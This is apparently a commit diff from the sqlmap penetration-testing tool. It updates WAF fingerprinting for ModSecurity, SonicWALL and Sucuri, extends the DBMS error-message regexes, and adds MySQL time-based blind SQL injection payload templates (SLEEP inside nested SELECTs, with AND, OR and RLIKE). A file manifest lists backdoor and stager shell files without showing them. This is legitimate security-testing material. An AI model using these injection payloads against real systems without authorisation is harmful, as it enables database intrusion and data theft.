a27325e2c88a0d38fe871509329cc9d5 plugins/dbms/sqlite/syntax.py
53b0be0cb6599d042bf6772e62b25ca5 plugins/dbms/sqlite/takeover.py
579d582f3716c310689b4aa7317b57df plugins/dbms/sybase/connector.py
7d58cbb4527d7a48ca05037f0b2ffe0a plugins/dbms/sybase/enumeration.py
ca107f3d1b4854ce84386109d476d494 plugins/dbms/sybase/filesystem.py
e095022426f2b986d069748ee2289af1 plugins/dbms/sybase/fingerprint.py
d0c7cc8ec2aa716b2e5cd3b5ab805c3a plugins/dbms/sybase/__init__.py
4763a90266c1633054ad7f3f0926a71d plugins/dbms/sybase/syntax.py
7a1c6cb238b5b464e1e9641469e6e503 plugins/dbms/sybase/takeover.py
62faa58e5aace4b6a6d562788685186f plugins/generic/connector.py
cdbf6eec4a94f830deb7dbab1c1a2935 plugins/generic/custom.py
977bbd1bced67c2c4aa74d12c77ac165 plugins/generic/databases.py
f2394baa3746188184be2144025eeffc plugins/generic/entries.py
e335b868f5fb1154c9f72143d602915d plugins/generic/enumeration.py
3e673ef4e6592f52a11d88e61fe4dc2b plugins/generic/filesystem.py
5637c508ca6348f29c2b100a3e80dddc plugins/generic/fingerprint.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/generic/__init__.py
7ffeee6d232ff6b342f362a2a4d226c0 plugins/generic/misc.py
7b3e044a7fca497278d79883697089b7 plugins/generic/search.py
73f8d047dbbcff307d62357836e382e6 plugins/generic/syntax.py
da3ebc20998af02e3d952d0417a67792 plugins/generic/takeover.py
4b5a6e2aec8e240fc43916d9dde27b14 plugins/generic/users.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/__init__.py
b04db3e861edde1f9dd0a3850d5b96c8 shell/backdoor.asp_
158bfa168128393dde8d6ed11fe9a1b8 shell/backdoor.aspx_
1add5a9a67539e7fd1999c8c20a69d15 shell/backdoor.jsp_
09fc3ed6543f4d1885e338b271e5e97a shell/backdoor.php_
ff90cb0366f7cefbdd6e573e27e6238c shell/runcmd.exe_
0e7aba05423c272f051f31165b0e416d shell/stager.asp_
c3cc8b7727161e64ab59f312c33b541a shell/stager.aspx_
1f7f125f30e0e800beb21e2ebbab18e1 shell/stager.jsp_
01e3505e796edf19aad6a996101c81c9 shell/stager.php_
56702e95555adee718b6a11ee7098fd4 sqlmapapi.py
7e80fcefc56426ed780c48556b70a1f0 sqlmap.py
1316deb997418507e76221c84ec99946 tamper/apostrophemask.py
a6efe8f914c769c52afec703bd73609f tamper/apostrophenullencode.py
b1c56983919b69f4f6f0e7929c881e7a tamper/appendnullbyte.py
1233f8bad4d9a33d7961073c449874a2 tamper/base64encode.py
6aa5ba5689d9689825338260194670e0 tamper/between.py
21f4ce75916531641cfe405ce91663fc tamper/bluecoat.py
43cfacec17de26ff2a61c519e2e86dc9 tamper/chardoubleencode.py
344751c277ca62fa42dac95deedb0cdf tamper/charencode.py
c6c90b5c175770ff98859653115dc478 tamper/charunicodeencode.py
b7f5de532d2b87a477840c7d2a3cf386 tamper/commalesslimit.py
e2aca0ea57afc24dd154472034dc9c8c tamper/commalessmid.py
7dec60fa5a1f27513cfba131e07b4d2f tamper/concat2concatws.py
906f38bffac305d341e69721631c9b1e tamper/equaltolike.py
11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py
731c25dd33fca28514930d4409daaaa3 tamper/greatest.py
1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py
17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py
dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py
cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py
4f022b7dbe12957003ee06e2610baa85 tamper/lowercase.py
38543c4fc77acbd346cdbdbdfebee799 tamper/modsecurityversioned.py
c16c3ed0ce302034d99ee0b8f34fbd0b tamper/modsecurityzeroversioned.py
658742d52fe9fcd357c87198650982b8 tamper/multiplespaces.py
e65ff0680df2fc89444ec5953bb2f161 tamper/nonrecursivereplacement.py
6780d738236ac200d230c4cb497bd1a2 tamper/overlongutf8.py
3f05d5218b22280adcd91fe53830bcb4 tamper/percentage.py
7a93f510f231278897650da1c7d13b23 tamper/randomcase.py
34c255f3bca6d5fee2dfb18ed86d406f tamper/randomcomments.py
f5e9eb84d4c5e9a19fe7154a8aebe13d tamper/securesphere.py
b4fc315dd6956dbe62a14c3efbe734b8 tamper/space2comment.py
c58858bebc9128a2685e93c985c8c23e tamper/space2dash.py
7cb376474d8d2dfa524be8f09d5bbf87 tamper/space2hash.py
ac2674939af0d1e82802d9343856db08 tamper/space2morehash.py
7f26c6fca4ef394c8d84c1ffe0162834 tamper/space2mssqlblank.py
df92b78d4ebe3de3e922eae1520020bf tamper/space2mssqlhash.py
63dcc179881387c6a2ca4b84b4723efe tamper/space2mysqlblank.py
6c9a0f9f98b938b0dc814644eeeb4d69 tamper/space2mysqldash.py
898361e5bc84fee788005a31494c1b8d tamper/space2plus.py
ea567cf81dafcb961eb1e88396534fd5 tamper/space2randomblank.py
da09cdc03e7d306e68a0c45322cc14c2 tamper/sp_password.py
84d536cd1296affcf4d294846508ef1a tamper/symboliclogical.py
50ead20b50db1051f8f3790c910b7b36 tamper/unionalltounion.py
f248289f5bc6ff9df8d82f8a3649d7a2 tamper/unmagicquotes.py
05824e0a1eb695bfc61d83ca8578de8f tamper/uppercase.py
ccdcf7afb18efd83d8b7a59d744fe51f tamper/varnish.py
a5f02f75856551499c0bf33672869a7f tamper/versionedkeywords.py
61aec82c2fb383bf9db95b74f5f0e67a tamper/versionedmorekeywords.py
99a90d668f367f5660698c00e84ec671 tamper/xforwardedfor.py
368165b45dadcdff4422bc010700832a thirdparty/ansistrm/ansistrm.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py
a53a7a876b401aaaa3535376676692ae thirdparty/beautifulsoup/beautifulsoup.py
cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py
ff54a1d98f0ab01ba7b58b068d2ebd26 thirdparty/bottle/bottle.py
4528e6a7bb9341c36c425faf40ef32c3 thirdparty/bottle/__init__.py
b20f539dc45fa9e514c1eb4f5aa8b5c6 thirdparty/chardet/big5freq.py
44159687c2bae35f165b44f07f5f167a thirdparty/chardet/big5prober.py
c80b09e2a63b375c02c8c1e825a953c5 thirdparty/chardet/chardetect.py
d2c4ad8cc905d95f148ead169d249eb8 thirdparty/chardet/chardistribution.py
24c57085435b8ad1a7bf9ff4ffe6cce0 thirdparty/chardet/charsetgroupprober.py
0cb6549c5cf979c8023f8aaf3392a117 thirdparty/chardet/charsetprober.py
241dd3b7d3eb97ae384320fc8346c6ff thirdparty/chardet/codingstatemachine.py
73f2b9ae331ab011571a3b3a2c62acc1 thirdparty/chardet/compat.py
6cccf2eada7dfa841a5c39aaecb037e7 thirdparty/chardet/constants.py
dd0087e46f835b791a5c9904fcda2de3 thirdparty/chardet/cp949prober.py
ecf56c6473c5a9bc0540a1ca11ec998a thirdparty/chardet/escprober.py
00590b3c94c4db8f25639ab261e4c725 thirdparty/chardet/escsm.py
99bc93e45136ecd15d8dfb489059f118 thirdparty/chardet/eucjpprober.py
65b6b3e75845e033ce34c11ccdd85450 thirdparty/chardet/euckrfreq.py
cc2282aef66a161b3451f9cf455fdd7d thirdparty/chardet/euckrprober.py
f13fee8c7bd6db0e8c40030ccacdfbde thirdparty/chardet/euctwfreq.py
ca66f5277872165faa5140068794604a thirdparty/chardet/euctwprober.py
0fb5414fcc0bdb8b04af324015505c06 thirdparty/chardet/gb2312freq.py
84284584b8e29f50f40781205a9d4e76 thirdparty/chardet/gb2312prober.py
354a83d1bb3c20b4626b6c4ad54d163a thirdparty/chardet/hebrewprober.py
d91ddc14e31824faacd96fa88e42a6b8 thirdparty/chardet/__init__.py
03be91b7ead4725af61234d4852bb7ab thirdparty/chardet/jisfreq.py
b59a7b8b0debe197444bf831ba42bbe9 thirdparty/chardet/jpcntx.py
e4e05437410aa80cf9a13afac19997fe thirdparty/chardet/langbulgarianmodel.py
74ce958cbef2eee08a7a04fb4db41260 thirdparty/chardet/langcyrillicmodel.py
7090da7635347b767b4eb194f697207d thirdparty/chardet/langgreekmodel.py
22df1e2996355e4c082cc0b2f8dbe261 thirdparty/chardet/langhebrewmodel.py
3b86d62fe73022a609b2e8095edecf87 thirdparty/chardet/langhungarianmodel.py
4f941425be84ee4e1b7ccb7c4b31e8d8 thirdparty/chardet/langthaimodel.py
9e7400a368b70c1acccab78d2cc489cd thirdparty/chardet/latin1prober.py
c27857a02a65a1100f3195f95c50aff9 thirdparty/chardet/mbcharsetprober.py
719ecf479d507a3e6450aefbaa42fcc8 thirdparty/chardet/mbcsgroupprober.py
2fd9f3c93568c552779bd46990027c36 thirdparty/chardet/mbcssm.py
93349a5fa5cb824d1485cd5f3a53928a thirdparty/chardet/sbcharsetprober.py
ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py
c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py
bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py
6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py
b678dcd25ecb1533ffe2493b6e711bb1 thirdparty/clientform/clientform.py
722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py
0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py
e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py
ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py
c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py
ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py
c690e140157d0caac5824c73688231b3 thirdparty/colorama/winterm.py
be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py
e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py
2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py
855372c870a23d46683f8aa39d75f6a1 thirdparty/gprof2dot/__init__.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/__init__.py
e3b18f925d125bd17c7e7a7ec0b4b85f thirdparty/keepalive/__init__.py
e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py
49f0d123e044dd32a452e2fe51f1a9c3 thirdparty/magic/magic.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py
fd52df5770ee286a7c186fdd2ccc4e0c thirdparty/multipart/multipartpost.py
3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py
127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py
08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py
54a861de0f08bb80c2e8846579ec83bd thirdparty/oset/__init__.py
179f0c584ef3fb39437bdb6e15d9c867 thirdparty/oset/pyoset.py
d24924d878e24946e83cfc1459f806af thirdparty/pagerank/__init__.py
7616693115d08f9b815a567515a0db56 thirdparty/pagerank/pagerank.py
94a4abc0fdac64ef0661b82aff68d791 thirdparty/prettyprint/__init__.py
ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py
5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py
a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py
ec6bab337d529037fb7db0b126bce7cd thirdparty/socks/socks.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py
ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py
593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py
08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
9bb247767c4ba118f2c5f0416e3e6151 waf/360.py
deb8dd4543177479b185af8b383a8bdf waf/airlock.py
0da662422cde266dd47cea3f5be6a309 waf/anquanbao.py
012b4acd41f0c12df88cf0276c2afd1a waf/armor.py
757fe0f66a24719fa596cb974ee6ae71 waf/baidu.py
8a26fe9e0ae48e8f28272769aa7dc16e waf/barracuda.py
826b64868a10caf1229d3bfcbbb4d594 waf/bigip.py
3105f71b03c428f8b58cbf7a91eebff0 waf/binarysec.py
e75422b8487f9937e050a60bc5c35896 waf/blockdos.py
f60078f702612da43dd2a8ed07e26694 waf/ciscoacexml.py
ac2edfa1d49b00b4bf730a9317090566 waf/cloudflare.py
c69e1091521671452eaedf4787817ede waf/cloudfront.py
765d0663658257ef0ab1060519c6e175 waf/comodo.py
33633c9a2b9d53c325ba1110607d566f waf/datapower.py
e0ad6e34b6082558e9f8f652d938c785 waf/denyall.py
1ab6764976b3e2e28bab68cc73b5d8d9 waf/dotdefender.py
037b715e1274fe2b4d2f31f6d24c9e77 waf/edgecast.py
29d0c8331a4d7013d784e5dc91db49aa waf/expressionengine.py
d50415b49d9df72cb9d193d05630ab8a waf/fortiweb.py
c5d83d63647baa46dadf5cf992156edc waf/generic.py
b302a688932296357fe10658a81eee0c waf/hyperguard.py
f62b484e9083fcbf271a2b0c8f6d3528 waf/incapsula.py
cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
5a898cfc081236d176274c5b513d0401 waf/isaserver.py
9689ff3faaeb2ea1837b3e04520b0e42 waf/jiasule.py
07eb9ee33a3e31bfc74763bea8026a2b waf/knownsec.py
32516985d3cb0aeeb1bf28062820b045 waf/kona.py
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py
4e05b8169e53edd36a6269e937958744 waf/newdefend.py
80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
e667efa27b53191315df547e95e04fa7 waf/profense.py
8d5609a37127782fb35af4f67b5787ee waf/proventia.py
40125df9f8184eab1926add588762294 waf/radware.py
fffbd039ec907274cdb6ee8e07e3cac4 waf/requestvalidationmode.py
44bef80f1a34663c3e0a963d969d9b1f waf/safe3.py
65a519516a597232fd902082dbcbc796 waf/safedog.py
e8cbddfffab8b400ea03f28ebfe14536 waf/secureiis.py
32de8507c956422926aaf13085dbcf42 waf/senginx.py
33db1ac9a11667199c7886bbb74f6b02 waf/sitelock.py
ff2b052672f4753be1508f2a22118631 waf/sonicwall.py
310b6081c65fb81917b8695b013559b6 waf/sophos.py
ade8698c8096d373034bac72069873f6 waf/stingray.py
b372c4fcc949767c38f2bead62d07418 waf/sucuri.py
4c02fbf63989df9ab58b04229f00f6df waf/teros.py
b5ea5375df444e0240f1ee0e2a8e52fb waf/trafficshield.py
89a11a755a4ea3cb71feb3f5f2b5809e waf/urlscan.py
0569c783e3487551affe5c91aec3c6d3 waf/uspses.py
960a8db9d3807fcd87f7f66dbfaa4628 waf/varnish.py
98c909c8b6e50d715e5b88c639ff1836 waf/wallarm.py
7a723ce2f1b82d7297a2ab025d5ca0be waf/webappsecure.py
75e51fea7f206e8faa2f743e44e58383 waf/webknight.py
3bcac085dcd9ed26b50a2320e418e9f3 waf/yundun.py
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
37603bc0905af0c65480a2ca959990ec xml/banner/generic.xml
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
c97c383b560cd578f74c5e4d88c88ed2 xml/banner/mysql.xml
9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml
0d1c881156b760492d8004bd0d926c63 xml/banner/postgresql.xml
b07b5c47c751787e136650ded060197f xml/banner/server.xml
e5d141fb2ba31e4eae3495554b538908 xml/banner/servlet.xml
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml

3
waf/modsecurity.py
View File

@@ -17,8 +17,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
retval = code == 501 and re.search(r"Reference #[0-9A-Fa-f.]+", page or "", re.I) is None
retval |= re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
retval = re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
retval |= "This error was generated by Mod_Security" in (page or "")
if retval:
break

1
waf/sonicwall.py
View File

@@ -18,6 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
page, headers, _ = get_page(get=vector)
retval = "This request is blocked by the SonicWALL" in (page or "")
retval |= re.search(r"Web Site Blocked.+\bnsa_banner", page or "", re.I) is not None
retval |= re.search(r"SonicWALL", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break

6
waf/sucuri.py
View File

@@ -10,14 +10,16 @@ import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "Sucuri WebSite Firewall"
__product__ = "CloudProxy WebSite Firewall (Sucuri)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
_, headers, code = get_page(get=vector)
page, headers, code = get_page(get=vector)
retval = code == 403 and re.search(r"Sucuri/Cloudproxy", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
retval |= "Sucuri WebSite Firewall - CloudProxy - Access Denied" in (page or "")
retval |= re.search(r"Questions\?.+cloudproxy@sucuri\.net", (page or "")) is not None
if retval:
break

21
xml/errors.xml
View File

@@ -27,14 +27,17 @@
<dbms value="Microsoft SQL Server">
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
<error regexp="OLE DB.* SQL Server"/>
<error regexp="\bSQL Server.*Driver"/>
<error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>
<error regexp="Warning.*(mssql|sqlsrv)_"/>
<error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
<error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>
<error regexp="System\.Data\.SqlClient\.SqlException"/>
<error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
<error regexp="Microsoft SQL Native Client.*[0-9a-fA-F]{8}"/>
<error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
<error regexp="com\.microsoft\.sqlserver\.jdbc\.SQLServerException"/>
<error regexp="ODBC SQL Server Driver"/>
<error regexp="SQLServer JDBC Driver"/>
<error regexp="macromedia\.jdbc\.sqlserver"/>
<error regexp="com\.jnetdirect\.jsql"/>
</dbms>
<!-- Microsoft Access -->
@@ -43,6 +46,7 @@
<error regexp="JET Database Engine"/>
<error regexp="Access Database Engine"/>
<error regexp="ODBC Microsoft Access"/>
<error regexp="Syntax error \(missing operator\) in query expression"/>
</dbms>
<!-- Oracle -->
@@ -52,6 +56,8 @@
<error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/>
<error regexp="Warning.*\Wora_.*"/>
<error regexp="oracle\.jdbc\.driver"/>
<error regexp="quoted string not properly terminated"/>
</dbms>
<!-- IBM DB2 -->
@@ -65,6 +71,9 @@
<!-- Informix -->
<dbms value="Informix">
<error regexp="Exception.*Informix"/>
<error regexp="Informix ODBC Driver"/>
<error regexp="com\.informix\.jdbc"/>
<error regexp="weblogic\.jdbc\.informix"/>
</dbms>
<!-- Interbase/Firebird -->
@@ -76,8 +85,8 @@
<!-- SQLite -->
<dbms value="SQLite">
<error regexp="SQLite/JDBCDriver"/>
<error regexp="SQLite.Exception"/>
<error regexp="System.Data.SQLite.SQLiteException"/>
<error regexp="SQLite\.Exception"/>
<error regexp="System\.Data\.SQLite\.SQLiteException"/>
<error regexp="Warning.*sqlite_.*"/>
<error regexp="Warning.*SQLite3::"/>
<error regexp="\[SQLITE_ERROR\]"/>

0
xml/payloads/01_boolean_blind.xml → xml/payloads/boolean_blind.xml
View File

0
xml/payloads/02_error_based.xml → xml/payloads/error_based.xml
View File

0
xml/payloads/03_inline_query.xml → xml/payloads/inline_query.xml
View File

4
xml/payloads/04_stacked_queries.xml → xml/payloads/stacked_queries.xml
View File

@@ -44,7 +44,7 @@
</test>
<test>
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP - comment)</title>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
<stype>4</stype>
<level>2</level>
<risk>1</risk>
@@ -65,7 +65,7 @@
</test>
<test>
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP)</title>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
<stype>4</stype>
<level>3</level>
<risk>1</risk>

123
xml/payloads/05_time_blind.xml → xml/payloads/time_blind.xml
View File

@@ -84,6 +84,88 @@
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query)</title>
<stype>5</stype>
@@ -207,6 +289,47 @@
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP)</title>
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0.12</dbms_version>
</details>
</test>
<test>
<title>MySQL AND time-based blind (ELT)</title>
<stype>5</stype>

0
xml/payloads/06_union_query.xml → xml/payloads/union_query.xml
View File